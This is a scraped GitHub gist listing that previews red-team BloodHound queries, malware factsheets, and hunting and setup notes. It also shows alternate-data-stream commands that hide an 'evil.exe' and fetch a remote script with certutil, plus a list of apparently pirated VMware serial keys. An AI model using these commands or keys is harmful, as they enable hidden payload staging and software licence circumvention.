Skip to content

Instantly share code, notes, and snippets.

View jhill-cmd's full-sized avatar

jhill-cmd jhill-cmd

4 followers · 4 following
View GitHub Profile
@0xmachos
0xmachos / macOS-IR-Forensics.md
Last active July 4, 2024 09:46
If someone wants to learn MacOS IR/forensics what’s the best resource for that?
@mgeeky
mgeeky / red-teaming-bloodhound-cypher-queries.md
Last active August 13, 2022 11:36
(OBSOLETED - most recent version: https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/red-teaming/bloodhound/Handy-BloodHound-Cypher-Queries.md ). A handy list of Cypher queries that I've used during AD assessments

(THIS LIST IS OBSOLETED, check out the latest version here: https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/red-teaming/bloodhound/Handy-BloodHound-Cypher-Queries.md )

  • Returns computer names and their operating system for statistics purposes
MATCH (c:Computer) WHERE c.operatingsystem is not null RETURN c.name as Name, c.operatingsystem as OS
  • Returns a summary report of machines grouped by their operating systems versions, along with number of machines running specific OS version:
MATCH (c:Computer) WHERE c.operatingsystem is not null MATCH (n:Computer {operatingsystem: c.operatingsystem}) RETURN c.operatingsystem as OS, count(distinct n) AS Number ORDER BY Number DESC
@nottux
nottux / opencl-amd_aur_ubuntu.bash
Last active October 19, 2023 20:23
bash implementation of opencl-amd AUR package, Install opencl amdgpu amdgpu-pro opencl only. Supports ubuntu and others with standard prefix
#!/bin/bash
# DO NOT run the line 167 standalone. It will remove the necessary files besides the junk!
if echo $@|grep -q "\-\-help\|\-help\|\-h\|help\|\-\-h\|\-\-no\-deb\|\-\-no\-install\|\-\-no\-cleaning\|\-\-assume\-debian"
then :
else echo wrong entry\(ies\) !
help=yes
fi
if echo $@|grep -q "\-\-help\|\-help\|\-h\|help\|\-\-h" || [ "$help" = yes ]
@gopalindians
gopalindians / VMware Workstation 15.x.x serial key
Last active July 5, 2024 12:23
Serial Keys:
FU512-2DG1H-M85QZ-U7Z5T-PY8ZD
CU3MA-2LG1N-48EGQ-9GNGZ-QG0UD
GV7N2-DQZ00-4897Y-27ZNX-NV0TD
YZ718-4REEQ-08DHQ-JNYQC-ZQRD0
GZ3N0-6CX0L-H80UP-FPM59-NKAD4
YY31H-6EYEJ-480VZ-VXXZC-QF2E0
ZG51K-25FE1-H81ZP-95XGT-WV2C0
VG30H-2AX11-H88FQ-CQXGZ-M6AY4
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active July 4, 2024 15:33
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@jermdw
jermdw / tanium_hunting_questions.md
Last active January 2, 2024 18:50
Tanium Hunting Questions

Tanium Hunting Questions

Initial Infection

New Scripts in Webroot Paths

Get "Trace File Operations[unlimited, 1488479715768|1488483314768, 1, 0, 0, 10, .*\\wwwroot\\.*\.(asp|aspx|cfm|jsp|php), CreateNewFile, , , ]" from all machines
@vulnersCom
vulnersCom / Petya_ransomware.md
Last active July 6, 2023 19:30

#petya #petrWrap #notPetya

Win32/Diskcoder.Petya.C

Ransomware attack.

About

This gist was built by the community of the researchers and was scribed by Kir and Igor from the QIWI/Vulners. We are grateful for the help of all those who sent us the data, links and information. Together we can make this world a better place!

Gist updates

@rain-1
rain-1 / Wannacrypt0r-FACTSHEET.md
Last active March 10, 2024 11:03 — forked from Epivalent/Wannacrypt0r-FACTSHEET.md

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

@alexlee-gk
alexlee-gk / configure_cuda_p70.md
Last active June 21, 2024 03:40
Use integrated graphics for display and NVIDIA GPU for CUDA on Ubuntu 14.04

This was tested on a ThinkPad P70 laptop with an Intel integrated graphics and an NVIDIA GPU:

lspci | egrep 'VGA|3D'
00:02.0 VGA compatible controller: Intel Corporation Device 191b (rev 06)
01:00.0 VGA compatible controller: NVIDIA Corporation GM204GLM [Quadro M3000M] (rev a1)

A reason to use the integrated graphics for display is if installing the NVIDIA drivers causes the display to stop working properly. In my case, Ubuntu would get stuck in a login loop after installing the NVIDIA drivers. This happened regardless if I installed the drivers from the "Additional Drivers" tab in "System Settings" or the ppa:graphics-drivers/ppa in the command-line.

@epixoip
epixoip / 8x1080.md
Last active March 20, 2024 17:14
8x Nvidia GTX 1080 Hashcat Benchmarks